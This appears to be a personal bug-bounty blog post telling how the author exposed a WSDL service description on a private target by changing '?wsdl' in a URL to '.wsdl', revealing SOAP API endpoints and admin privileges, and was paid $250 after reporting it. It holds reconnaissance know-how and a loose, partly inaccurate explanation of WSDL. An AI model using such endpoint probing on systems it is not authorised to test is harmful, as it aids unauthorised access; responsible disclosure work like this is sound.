A small change, and things go in your hand : Story of a $250 bounty
--
Hi there,
The write-ups is about how a small change, lead to fetch me $250 in security research. Let’s start the story
Some days back, i joined Bugcrowd and eventually got addicted of it because of fast response, acceptance of bugs with respect to severity (unlike Hackerone, whose triage system is good, but response time is quite slow due to the fact that a lot…. sorry, huge amount of people are over there.)
Check Out Bugcrowd :-
Now, the target was private so, i don’t want to disclose in-front of people (say https://example.com/ for understanding about the target and further attacks)
So, when i got the target, i found out some basic things about the target by “Spider”the web in Burpsuite. Those who don’t know about “Spidering” in Burspuite, the link is here :-
So, after Spidering the website, i found an endpoint like this :-
-> https://example.com/exemted_file?wsdl
Now, generally, WSDL is a language used for describing the functionality offered by a web services. In short, language that specifies what admin and user have, as a privilege. (This is what i understood for attack point of view)
In my previous write-up, i shared that a small manipulation brought me an appreciation from the organization. If you wish to read, here is the link :-
So, Let’s proceed. Using the same technique of manipulation , i inspected the URL :
-> https://example.com/exemted_file-wsdl
Interesting the response was “Page not found”, but in Burpsuite, the request was being made successfully. After intercepting this request during live interception, i draw a conclusion, that there is something wrong.
The wrong thing was that i got to know about the session is loading, but not reflecting in the browser. I read about WSDL from Google, that how they are implemented and what are the harm thing a person can do (in my way, “Reversing the work”).
Learn about WSDL :-
Harm Things == Great things (For me)
So i found out that WSDL extensions have some issues with symbol allotment. (The error was not clear to me too, so i tried out to see the example.) The problem, in simple words was “When on changes the query of wsdl (that is, from ? to .), then the request send is different then getting the “Page not found” error”.
So, simply, i changed it as this :-
-> https://example.com/exemted_file-wsdl (previous request)
-> https://example.com/exemted_file.wsdl (Changed “?” , then “— “ to “.”)
And seriously man, it revealed everything. It revealed the admin privileges in the portal. It shows those end-points that are available to changes. I tried to escalate it, but it was not worth it, for all end-points were blocked..!!!!
FYI, the privileges that were exposed were related to SOAP API.
They responded back in the best way possible, fast, smooth and interestingly great. And, they provided me with the bounty of $250. It was good feeling to get a bounty after quite a time (I searched this for one day, complete.)
Tip :- With end-points, find what purpose it serves. And it will return you with the best answer, “a small loophole of the functionalities.”
Google, and your hand is filled with a great bug..!!!!
Hope you get what i shared, and if it feels right to share others, do that too. Thanks for having a read.
===========Happy Hacking===========
